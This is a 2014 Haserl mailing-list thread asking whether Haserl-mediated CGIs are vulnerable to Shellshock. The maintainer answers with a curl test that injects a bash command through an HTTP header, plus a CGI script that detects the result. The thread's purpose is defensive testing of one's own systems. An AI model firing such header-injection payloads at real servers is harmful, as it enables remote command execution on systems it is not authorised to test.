Thread: [Haserl-users] Are Haserl-mediated CGIs vulnerable to Shellshock?

Brought to you by: nangel

haserl-users

[Haserl-users] Are Haserl-mediated CGIs vulnerable to Shellshock?

From: Daniel G. <gr...@su...> - 2014-09-27 17:01:18

Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.

I understand that if I'd had my web server (thttpd) directly invoke a /bin/bash script then my site would be vulnerable to Shellshock. However, I'm not clear on what happens if thttpd invokes Haserl, which does its text processing and then invokes /bin/bash? Can the attack get through? Any idea how I'd test?


Thanks,
Dan

-- 
Daniel T. Griscom             gr...@su...
Suitable Systems              http://www.suitable.com/
1 Centre Street, Suite 204    (781) 665-0053
Wakefield, MA  01880-2400

Re: [Haserl-users] Are Haserl-mediated CGIs vulnerable to Shellshock?

From: Nathan A. <na...@us...> - 2014-09-27 19:16:05

Daniel,

If you are really using bash, then unfortunately you are vulnerable.

To test, use curl to add a bogus header:

curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned' 
http://example.com/haserl.cgi


In my case, haserl.cgi is:

#!/usr/bin/haserl --shell=/bin/bash
<%
echo -e "Content-type: text/plain\r\n\r\n"

env

if [ -e /tmp/owned ]; then
   echo "vulnerable"
   rm /tmp/owned
fi
%>

In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error 
(lighttpd), but the /tmp/owned file was created - so that on subsequent 
requests (without the -H option) the last line of the cgi was "vulnerable".

> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.

Debian and ubuntu use "dash" as the /bin/sh shell.  I think its only 
user accounts that specifically get bash

Run 'ls -l /bin/sh'

to see what your systems use.   That's why I had to explicitly specify 
the shell in the cgi.  When I use the default /bin/sh on ubuntu, the 
attack fails.

Re: [Haserl-users] Are Haserl-mediated CGIs vulnerable to Shellshock?

From: Daniel G. <gr...@su...> - 2014-09-28 12:58:31

Thanks for the detailed response: it was really helpful. We're using thttpd. My own testing shows that there are a lot of hoops for the attacker to jump through, and he's flying blind (no output), but there's likely enough attack surface area for someone who can play with one of our boxes to be able to break into another one.


Thanks,
Dan

At 2:59 PM -0400 9/27/14, Nathan Angelacos wrote:
>Daniel,
>
>If you are really using bash, then unfortunately you are vulnerable.
>
>To test, use curl to add a bogus header:
>
>curl -H 'X-SHELLSHOCK: () { :; }; /usr/bin/touch /tmp/owned'
>http://example.com/haserl.cgi
>
>
>In my case, haserl.cgi is:
>
>#!/usr/bin/haserl --shell=/bin/bash
><%
>echo -e "Content-type: text/plain\r\n\r\n"
>
>env
>
>if [ -e /tmp/owned ]; then
>   echo "vulnerable"
>   rm /tmp/owned
>fi
>%>
>
>In my testing, the cgi segfaulted (mini_httpd) or returned a 500 error
>(lighttpd), but the /tmp/owned file was created - so that on subsequent
>requests (without the -H option) the last line of the cgi was "vulnerable".
>
>> Like many (most?) Haserl users, our company uses it to build embedded web CGIs by having it invoke a shell script using the default /bin/sh. /bin/sh, of course, is actually bash, which is in the news these days as the latest black hat vector.
>
>Debian and ubuntu use "dash" as the /bin/sh shell.  I think its only
>user accounts that specifically get bash
>
>Run 'ls -l /bin/sh'
>
>to see what your systems use.   That's why I had to explicitly specify
>the shell in the cgi.  When I use the default /bin/sh on ubuntu, the
>attack fails.
>
>
>
>
>
>
>------------------------------------------------------------------------------
>Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>_______________________________________________
>Haserl-users mailing list
>Has...@li...
>https://lists.sourceforge.net/lists/listinfo/haserl-users


-- 
Daniel T. Griscom             gr...@su...
Suitable Systems              http://www.suitable.com/
1 Centre Street, Suite 204    (781) 665-0053
Wakefield, MA  01880-2400